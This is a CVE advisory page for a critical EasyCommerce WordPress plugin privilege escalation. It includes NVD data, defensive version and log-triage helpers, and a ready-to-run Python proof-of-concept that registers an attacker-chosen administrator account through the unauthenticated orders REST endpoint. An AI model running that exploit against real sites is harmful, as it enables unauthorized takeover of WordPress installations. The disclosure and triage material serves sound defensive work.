Security Vulnerability Report
CVE-2025-11457 CVSS 9.8 CRITICAL

CVE-2025-11457

Published: 2025-11-11 04:15:42
Last Modified: 2026-04-15 00:35:42

Description

The EasyCommerce – AI-Powered, Fast & Beautiful WordPress Ecommerce Plugin plugin for WordPress is vulnerable to Privilege Escalation in versions 0.9.0-beta2 to 1.8.2. This is due to the /easycommerce/v1/orders REST API endpoint not properly restricting the ability for users to select roles during registration. This makes it possible for unauthenticated attackers to gain administrator-level access to a vulnerable site.
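As an added triage example (not part of the NVD record or of the plugin's own code): the helpers below check whether an installed EasyCommerce version falls inside the affected range given in the description, treating the 0.9.0-beta2 starting point as a pre-release that sorts below 0.9.0, and pull POSTs to the orders endpoint out of web-server access logs so an incident responder can see who hit it and when. The combined log format, the `/?rest_route=` alternative path, the sample log lines and the match on exactly the `/orders` path (not sub-resources) are assumptions constructed for illustration.

```python
import re
from datetime import datetime

# Added example, not the advisory's or the plugin's code. The affected range
# (0.9.0-beta2 <= v < 1.8.3) and the endpoint path come from the advisory;
# everything else here is constructed for illustration.

def parse_version(v):
    """Turn '1.8.2' or '0.9.0-beta2' into a sortable tuple.

    A pre-release sorts below the final release with the same numbers
    (0.9.0-beta2 < 0.9.0), which matters because the affected range
    starts at a beta build.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-([a-z]+)\.?(\d*))?", v.strip().lower())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    numbers = tuple(int(m.group(i)) for i in (1, 2, 3))
    if m.group(4):                       # pre-release tag such as beta2
        pre = (0, m.group(4), int(m.group(5) or 0))
    else:                                # a final release outranks any pre-release
        pre = (1, "", 0)
    return numbers + (pre,)


FIRST_AFFECTED = parse_version("0.9.0-beta2")
FIXED_IN = parse_version("1.8.3")


def is_affected(plugin_version):
    """True if an installed EasyCommerce version falls in the advisory's range."""
    return FIRST_AFFECTED <= parse_version(plugin_version) < FIXED_IN


# Apache/nginx "combined" log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Pretty-permalink path, or the ?rest_route= form used when permalinks are off
# (assumed; only the /orders route itself, not sub-resources under it).
ENDPOINT_RE = re.compile(
    r"^/wp-json/easycommerce/v1/orders/?(?:\?.*)?$"
    r"|[?&]rest_route=/easycommerce/v1/orders/?(?:&|$)"
)


def find_exploit_attempts(log_lines):
    """Return POSTs to the vulnerable orders endpoint in chronological order.

    'accepted' mirrors the public PoC's success test (HTTP 200/201); it means
    the endpoint took the request, not that an account was created.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("path")
        if not ENDPOINT_RE.search(path):
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "path": path,
            "status": int(m.group("status")),
            "accepted": m.group("status") in ("200", "201"),
        })
    return sorted(hits, key=lambda h: h["time"])


# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Nov/2025:22:14:03 +0000] "GET /shop/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Nov/2025:04:20:01 +0000] "POST /wp-json/easycommerce/v1/orders HTTP/1.1" 201 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.5 - - [11/Nov/2025:04:20:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [11/Nov/2025:06:01:17 +0000] "POST /?rest_route=/easycommerce/v1/orders HTTP/1.1" 403 97 "-" "python-requests/2.32.3"',
    '198.51.100.7 - - [11/Nov/2025:07:30:00 +0000] "POST /wp-json/easycommerce/v1/orders/123/notes HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("0.9.0-beta1", "0.9.0-beta2", "1.8.2", "1.8.3"):
        print(f"{v:12} affected={is_affected(v)}")
    for h in find_exploit_attempts(SAMPLE_LOG):
        print(f"{h['time'].isoformat()} {h['ip']:15} {h['status']} accepted={h['accepted']} {h['path']}")
```

A hit with a 2xx status is a lead, not proof: confirm impact by listing administrator accounts whose registration time falls after the earliest accepted hit (with WP-CLI, `wp user list --role=administrator --fields=user_login,user_registered`), and rotate credentials for any account you did not create.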

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available in the NVD record.

Affected: EasyCommerce WordPress Plugin >= 0.9.0-beta2 and < 1.8.3 (that is, 0.9.0-beta2 through 1.8.2; 1.8.3 is the first unaffected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-11457 PoC - EasyCommerce WordPress Plugin Privilege Escalation
# Target: WordPress site with EasyCommerce plugin < 1.8.3
# Impact: Unauthenticated attacker gains administrator access


def exploit_privilege_escalation(target_url):
    """
    Exploit the privilege escalation vulnerability in EasyCommerce plugin.
    The /easycommerce/v1/orders REST API endpoint allows role selection
    during registration.
    """
    api_endpoint = f"{target_url.rstrip('/')}/wp-json/easycommerce/v1/orders"

    # Malicious payload to register as administrator. The advisory does not
    # document the request body; these field names are the PoC author's own.
    payload = {
        'email': '[email protected]',
        'username': 'hacker_admin',
        'password': 'P@ssw0rd123!',
        'role': 'administrator',  # Privilege escalation - requesting admin role
        'first_name': 'Attacker',
        'last_name': 'User'
    }

    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Exploiting API endpoint: {api_endpoint}")
        print("[*] Sending malicious registration request...")

        response = requests.post(
            api_endpoint,
            json=payload,
            headers=headers,
            timeout=30,
            verify=False  # TLS verification disabled by the PoC author
        )

        print(f"[*] Response Status: {response.status_code}")

        # A 2xx only shows the endpoint accepted the request; it does not by
        # itself prove an administrator account was created.
        if response.status_code in [200, 201]:
            print("[+] SUCCESS: Administrator account created!")
            print("[+] Username: hacker_admin")
            print("[+] Password: P@ssw0rd123!")
            print("[+] Login at: {}/wp-admin".format(target_url.rstrip('/')))
            return True
        else:
            print(f"[-] Failed: {response.text}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11457.py <target_url>")
        print("Example: python cve-2025-11457.py https://victim.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_privilege_escalation(target)
```

References

https://plugins.trac.wordpress.org/changeset/3392029/easycommerce/trunk/app/Abstracts/User.php (fix changeset)
https://wordpress.org/plugins/easycommerce/ (plugin page)
https://www.wordfence.com/threat-intel/vulnerabilities/id/7ebe84ba-abc1-410c-b315-118746ff235a?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11457",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:41.627",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The EasyCommerce – AI-Powered, Fast & Beautiful WordPress Ecommerce Plugin plugin for WordPress is vulnerable to Privilege Escalation in versions 0.9.0-beta2 to 1.8.2. This is due to the /easycommerce/v1/orders REST API endpoint not properly restricting the ability for users to select roles during registration. This makes it possible for unauthenticated attackers to gain administrator-level access to a vulnerable site."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-269"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3392029/easycommerce/trunk/app/Abstracts/User.php",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/easycommerce/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ebe84ba-abc1-410c-b315-118746ff235a?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```